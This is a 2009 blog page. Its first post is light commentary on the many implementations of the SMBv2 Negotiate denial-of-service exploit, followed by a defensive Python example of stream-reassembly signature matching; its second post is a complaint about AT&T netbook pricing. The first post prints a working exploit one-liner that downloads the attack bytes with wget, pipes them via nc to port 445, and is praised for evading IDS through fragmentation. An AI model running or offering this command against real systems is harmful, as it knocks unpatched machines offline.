Friday, September 11, 2009

The most implemented exploit ever: SMBv2 Negotiate DoS

Swinging by SecurityFocus' exploit list for the recent SMBv2 denial of service, I was immediately struck by the apparent silliness of listing five separate but nearly identical implementations of the same bug. So struck, I daresay, that I could not resist writing my own stand-alone Ruby version, joking that maybe SecurityFocus will pick it up and make me famous.

Well, they did, and I did lol.

They also picked up I)ruid's much more interesting bash shell version. I thought that opening a socket straight on the command line was strictly the purview of Plan 9, but he proved me wrong.

The most "meta" version, so far, is Brent's wget-to-netcat implementation; I couldn't get it to function exactly as his tweet was written, but here's a version that Works For Me:
for i in `wget http://ur1.ca/bhe8 -q -O-|egrep 'oit.*".*"'|sed 's/s.*[<|=]//g'|sed 's/#.*//g'|sed 's/ "\(.*\)"/\1/'`;do echo -e -n $i;done|nc -w 1 127.0.0.1 445 > /dev/null
This has the added bonus of including some mild fragmentation, making IDS detection a little more squirrelly.
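
The fragmentation remark above is the reason a signature has to be matched against the reassembled TCP stream rather than against single packets. The following is an added example, not code from the original post: the five-byte marker (SMB header magic plus the Negotiate command byte), the flow tuple and the sample message are constructed for illustration and are not a rule for this specific bug.

```python
from collections import defaultdict

# Illustrative marker only: SMB1 header magic followed by the Negotiate
# command byte (0x72). A production rule would inspect more of the request.
SIGNATURE = b"\xffSMB\x72"
# Constructed sample: 4-byte session header, the marker, then zero padding.
MESSAGE = b"\x00\x00\x00\x10" + SIGNATURE + b"\x00" * 11
FLOW = ("192.0.2.10", 40000, "192.0.2.20", 445)  # documentation addresses


def split(flow, data, size, isn=0):
    """Cut one message into (flow, seq, payload) segments of `size` bytes."""
    return [(flow, isn + i, data[i:i + size]) for i in range(0, len(data), size)]


def match_per_segment(segments):
    """Naive matcher: looks at each TCP payload in isolation."""
    return any(SIGNATURE in payload for _flow, _seq, payload in segments)


class StreamMatcher:
    """Orders segments by sequence number per flow and matches across
    segment boundaries. Overlaps and sequence wrap are not handled here."""

    def __init__(self, signature):
        self.sig = signature
        self.pending = defaultdict(dict)  # flow -> {seq: payload}
        self.next_seq = {}                # flow -> next expected seq
        self.tail = defaultdict(bytes)    # flow -> last len(sig)-1 bytes seen

    def feed(self, flow, seq, payload, isn=0):
        """Return True if the signature completes in the ordered stream."""
        self.next_seq.setdefault(flow, isn)
        self.pending[flow][seq] = payload
        hit = False
        while self.next_seq[flow] in self.pending[flow]:
            data = self.pending[flow].pop(self.next_seq[flow])
            self.next_seq[flow] += len(data)
            window = self.tail[flow] + data
            hit = hit or self.sig in window
            self.tail[flow] = window[-(len(self.sig) - 1):]
        return hit


def detect_stream(segments):
    """Feed every segment through a fresh StreamMatcher."""
    matcher = StreamMatcher(SIGNATURE)
    return any([matcher.feed(f, s, p) for f, s, p in segments])
```

With the sample message cut into 3-byte segments, the per-segment matcher sees nothing while the stream matcher still fires, including when the segments arrive out of order.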

At any rate, I think this is all quite hilarious, and now I'm hopeful that the SMBv2 bug will be the widest-implemented DoS ever.

Update: I)ruid has published a version in Expect

Update: I've published a version in Perl

Update: Someone published a version in Java


Thursday, September 10, 2009

AT&T Netbooks, only $1159

I saw an ad on TV about AT&T practically giving away Acer netbooks. Here's the link of note.

So, it's $199 for a netbook, as long as you sign a two-year contract for a DataConnect plan... and that's where they get you, as they say. $40/month, plus $199, makes this a $1159 computing device over two years. Oh, and the $40/month plan is capped at 200 mb/month. Uhhhhh yeah.

This seems to suck significantly more than I expected.

Back to Plan A, being an Android phone on T-Mobile and a tethered POS laptop. Now to figure out if their data plans are unlimited. (I've been having creeping problems with my BlackBerry 8310, which is why I'm looking at this now.)
